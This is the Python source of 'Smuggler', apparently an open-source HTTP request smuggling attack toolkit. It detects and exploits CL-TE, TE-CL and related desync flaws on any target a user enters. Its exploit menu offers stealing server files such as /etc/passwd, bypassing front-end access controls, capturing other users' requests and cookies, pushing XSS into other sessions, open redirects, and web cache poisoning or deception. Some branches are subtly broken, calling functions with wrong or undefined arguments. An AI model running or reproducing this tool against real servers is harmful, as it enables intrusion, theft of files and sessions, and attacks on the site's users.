#!/usr/bin/env python3 # -*- coding: utf-8 -*-" """ Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net) You should have received a copy of the GNU General Public License along with PandeMaths; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import sys, socket, ssl VERSION = "v0.1_beta" RELEASE = "25_04_2020" SOURCE1 = "https://code.03c8.net/epsylon/smuggler" SOURCE2 = "https://github.com/epsylon/smuggler" CONTACT = "epsylon@riseup.net - (https://03c8.net)" try: import payloads.payloads # import payloads except: print ("\n[Info] Try to run the tool with Python3.x.y... (ex: python3 smuggler.py) -> [EXITING!]\n") sys.exit() VULNERABLE_LIST = [] def set_target(): target = input("\n + Enter DOMAIN/IP (ex: 'http(s)://www.target.com'): ").lower() if target.startswith("http://"): target = target.replace("http://","") port = 80 SSL = False elif target.startswith("https://"): target = target.replace("https://","") port = 443 SSL = True else: print("\n[Error] Target is invalid: '"+str(target)+"'\n") print("="*50) sys.exit() method = input("\n + Enter HTTP Method (ex: POST): ").upper() if method == "GET" or method == "POST": pass else: print("\n[Error] Method is invalid: '"+str(method)+"'\n") print("="*50) sys.exit() path = input("\n + Enter PATH (ex: '/'): ") if path == "": path = "/" return target, port, SSL, method, path def detect(): # detect menu target, port, SSL, method, path = set_target() # set target print("\n"+"="*50 + "\n") print("[Info] Starting HTTP Smuggling detection ...") payloads_dsync = payloads.payloads.payloads # load payloads addr = (target, port) print("") for payload in payloads_dsync: attack_type = payload.split("#")[0] payload_type = payload.split("#")[1] print("="*50) print("Trying payload: ["+str(attack_type)+"]") print("="*50+"\n") payload = method+" "+path+" HTTP/1.1\r\nHost: "+target+"\r\n"+payload_type print("+ PAYLOAD:\n") print(payload) send_payload(attack_type, payload, addr, SSL) # send each payload show_results(target, port, method, path) # show final results def send_payload(attack_type, payload, addr, SSL): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if SSL == True: # ssl ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23) try: if SSL == True: # ssl ss.connect(addr) else: s.connect(addr) except: print("-"*45) print("[Error] Generating socket... -> [PASSING!]") print("-"*45+"\n") s.close() if SSL == True: # ssl ss.close() return for i in range(1,20): # 20x tests if SSL == True: # ssl ss.send(payload.encode('utf-8')) else: s.send(payload.encode('utf-8')) datas="" while 1: if SSL == True: # ssl data = ss.recv(1024) else: data = s.recv(1024) if not data: break datas += str(data.decode('utf-8')) print("\n+ REPLY:\n") print(str(datas)) resp_c=0 resp="" wait=False for line in datas.split('\n'): if line.startswith('HTTP/1.1 400 BAD_REQUEST') or line.startswith('HTTP/1.1 400 Bad Request') or line.startswith('HTTP/1.1 400 BAD REQUEST'): wait=True elif line.startswith('HTTP/1.0 400 BAD_REQUEST') or line.startswith('HTTP/1.0 400 Bad Request') or line.startswith('HTTP/1.0 400 BAD REQUEST'): wait=True elif line.startswith('HTTP/1.1 '): wait=False resp_c+=1 if not wait: resp += line+'\n' print("-"*45) if resp_c > 0: print ("PAYLOAD: ["+str(attack_type)+"] is WORKING! ;-)") VULNERABLE_LIST.append(attack_type) # add attack type for results else: print ("PAYLOAD: ["+str(attack_type)+"] is NOT working...") print("-"*45+"\n") s.close() if SSL == True: # ssl ss.close() def show_results(target, port, method, path): print("="*50) print("\n+ FINAL RESULTS: -HTTP Smuggling- Attack\n") print("-"*45+"\n") print(" - TARGET: "+str(target)+":"+str(port)) print(" - Method: "+str(method)) print(" - Path : "+str(path)) CLCL = False TETE = False TECL = False CLTE = False if VULNERABLE_LIST: print("\n - STATUS: [ VULNERABLE !!! ]\n") for v in VULNERABLE_LIST: # resume vulnerable payloads found if v.startswith("CL-CL") and CLCL == False: # CL-CL print(" * [CL-CL]: [Front-end: Content Length] <-> [Back-end: Content Length]") CLCL = True elif v.startswith("TE-TE") and TETE == False: # TE-TE print(" * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]") TETE = True elif v.startswith("TE-CL") and TECL == False: # TE-CL print(" * [TE-CL]: [Front-end: Transfer-Encoding] <-> [Back-end: Content Length]") TECL = True elif v.startswith("CL-TE") and CLTE == False: # CL-TE print(" * [CL-TE]: [Front-end: Content-Length] <-> [Back-end: Transfer-Encoding]") CLTE = True else: pass else: print("\n - STATUS: [ NOT VULNERABLE ]") print("\n"+"="*50+"\n") def exploit(): # exploit menu exploit = input("\n+ SELECT EXPLOIT:\n\n (0) Steal files (ex: '/etc/passwd')\n (1) Bypass Front-End Security Controls\n (2) Reveal Front-End Rewriting\n (3) Capture Users Requests\n (4) Re-Exploit a XSS Reflected\n (5) Turn into an Open-Redirect\n (6) Web Cache Poisoning\n (7) Web Cache Deception\n\n") if exploit == "0": # steal files exploit_steal() elif exploit == "1": # bypass front-end exploit_bypass() elif exploit == "2": # reveal front-edn rewriting exploit_reveal() elif exploit == "3": # capture users requests exploit_capture() elif exploit == "4": # re-exploit xss reflection exploit_xss() elif exploit == "5": # turn into open-redirect 'zombie' exploit_openredirect() elif exploit == "6": # webcache poisoning exploit_poison() elif exploit == "7": # webcache deception exploit_deception() else: # exit print ("[Info] Not any valid exploit selected... -> [EXITING!]\n") sys.exit() def send_exploit(addr, SSL, exploit): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if SSL == True: # ssl ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23) try: if SSL == True: # ssl ss.connect(addr) else: s.connect(addr) except: print("\n"+"-"*45) print("[Error] Generating socket... -> [PASSING!]") print("-"*45+"\n") s.close() if SSL == True: # ssl ss.close() return if SSL == True: # ssl ss.send(exploit.encode('utf-8')) else: s.send(exploit.encode('utf-8')) datas="" while 1: if SSL == True: # ssl data = ss.recv(1024) else: data = s.recv(1024) if not data: break datas += str(data.decode('utf-8')) print("\n+ REPLY:\n") print(str(datas)) def exploit_bypass(): print("\n"+"="*50 + "\n") print("[Info] Trying to Bypass Front-End Security Controls...") target, port, SSL, method, path = set_target() # set target addr = (target, port) restricted_path = input("\n + Enter RESTRICTED ZONE (ex: '/admin'): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '50'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 50 if not content_length: content_length = 50 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 1 TE-CL exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 1 CL-TE exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 1 TE-TE exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 1 CL-CL exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$restricted_path", restricted_path) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$restricted_path", restricted_path) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_reveal(): print("\n"+"="*50 + "\n") print("[Info] Trying to Reveal Front-End Rewriting...") target, port, SSL, method, path = set_target() # set target addr = (target, port) parameter = input("\n + Enter PARAMETER reflected (ex: 'user'): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '130'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 130 if not content_length: content_length = 130 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 2 TE-CL exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 2 CL-TE exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 2 TE-TE exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 2 CL-CL exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$parameter", parameter) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$parameter", parameter) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_capture(): print("\n"+"="*50 + "\n") print("[Info] Trying to Capture Users Requests (cookies, other sensitive data, etc)...") target, port, SSL, method, path = set_target() # set target addr = (target, port) parameters = input("\n + Enter PARAMETERS (ex: 'csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Admin&comment='): ") cookie = input("\n + Enter COOKIE (ex: 'session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO'): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '130'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 130 if not content_length: content_length = 130 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 3 TE-CL exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 3 CL-TE exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 3 TE-TE exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 3 CL-CL exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$parameters", parameters) exploit = exploit.replace("$cookie", cookie) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$parameters", parameters) exploit = exploit.replace("$cookie", cookie) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_xss(): print("\n"+"="*50 + "\n") print("[Info] Trying to Re-Exploit a XSS Reflected (found in HTTP Headers) into other's sessions (NOT USER INTERACTION REQUIRED!)...") target, port, SSL, method, path = set_target() # set target addr = (target, port) header = input("\n + Enter VULNERABLE HEADER (ex: 'User-Agent'): ") xss = input("\n + Enter XSS Injection (ex: ''): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 100 if not content_length: content_length = 100 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 4 TE-CL exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 4 CL-TE exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 4 TE-TE exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 4 CL-CL exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$header", header) exploit = exploit.replace("$xss", xss) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$header", header) exploit = exploit.replace("$xss", xss) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_openredirect(): print("\n"+"="*50 + "\n") print("[Info] Trying to turn an on-site redirect into an Open-Redirect (ex: UFONet 'zombie')...") target, port, SSL, method, path = set_target() # set target addr = (target, port) location = input("\n + Enter NEW LOCATION (ex: 'otherwebsite.com'): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 100 if not content_length: content_length = 100 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 5 TE-CL exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 5 CL-TE exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 5 TE-TE exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 5 CL-CL exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$location", location) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_openredirect_armed(exploit, method, path, target, location, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$location", location) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_poison(): print("\n"+"="*50 + "\n") print("[Info] Trying to perform web cache poisoning...") target, port, SSL, method, path = set_target() # set target addr = (target, port) location = input("\n + Enter POISON DOMAIN/IP (ex: 'attacker-website.net'): ") script = input("\n + Enter POISON SOURCE (ex: '/static/defaced.js'): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 100 if not content_length: content_length = 100 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 6 TE-CL exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 6 CL-TE exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 6 TE-TE exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 6 CL-CL exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$location", location) exploit = exploit.replace("$script", script) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$location", location) exploit = exploit.replace("$script", script) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_deception(): print("\n"+"="*50 + "\n") print("[Info] Trying to perform web cache deception leaking...") target, port, SSL, method, path = set_target() # set target addr = (target, port) private = input("\n + Enter RESTRICTED ZONE (ex: '/private/messages'): ") content_length = input("\n + Enter CONTENT-LENGTH (default: '100'): ") request_type = input("\n + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ") try: content_length = int(content_length) except: content_length = 100 if not content_length: content_length = 100 exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception) if request_type == "TE-CL": if "TE-CL" in exp: # exploit 7 TE-CL exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL) elif request_type == "CL-TE": if "CL-TE" in exp: # exploit 7 CL-TE exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL) elif request_type == "TE-TE": if "TE-TE" in exp: # exploit 7 TE-TE exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL) elif request_type == "CL-CL": if "CL-CL" in exp: # exploit 7 CL-CL exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL) else: # send all! exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$private", private) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL): exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$private", private) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def exploit_steal(): print("\n"+"="*50 + "\n") print("[Info] Trying to steal files from server...") target, port, SSL, method, path = set_target() # set target addr = (target, port) files = input("\n + Enter FILE (ex: '/etc/passwd'): ") exploits_dsync = payloads.payloads.exploits # load exploits for exp in exploits_dsync: if "EXPLOIT-0" in exp: # extract exploit-0 (steal files) exploit = exp.split("#")[1] exploit = exploit.replace("$method", method) exploit = exploit.replace("$path", path) exploit = exploit.replace("$target", target) exploit = exploit.replace("$files", files) content_length = len(files)+2 # p=len(files) exploit = exploit.replace("$CL", str(content_length)) print("\n"+"="*50+"\n") print("+ PAYLOAD MODE: [CL-CL]\n") print(str(exploit)) send_exploit(addr, SSL, exploit) # send expoit def print_banner(): print("\n"+"="*50) print(" ____ __ __ _ _ ____ ____ _ _____ ____ ") print("/ ___|| \/ | | | |/ ___|/ ___| | | ____| _ \ ") print("\___ \| |\/| | | | | | _| | _| | | _| | |_) |") print(" ___) | | | | |_| | |_| | |_| | |___| |___| _ < ") print("|____/|_| |_|\___/ \____|\____|_____|_____|_| \_\ by psy") print('\n"HTTP -Smuggling- (DSYNC) Attacking Toolkit"') print("\n"+"-"*15+"\n") print(" * VERSION: ") print(" + "+VERSION+" - (rev:"+RELEASE+")") print("\n * SOURCES:") print(" + "+SOURCE1) print(" + "+SOURCE2) print("\n * CONTACT: ") print(" + "+CONTACT+"\n") print("-"*15+"\n") print("="*50) # sub_init # print_banner() # show banner option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper() print("\n"+"="*50) if option == "D": # detecting phase detect() else: # trying to exploit exploit()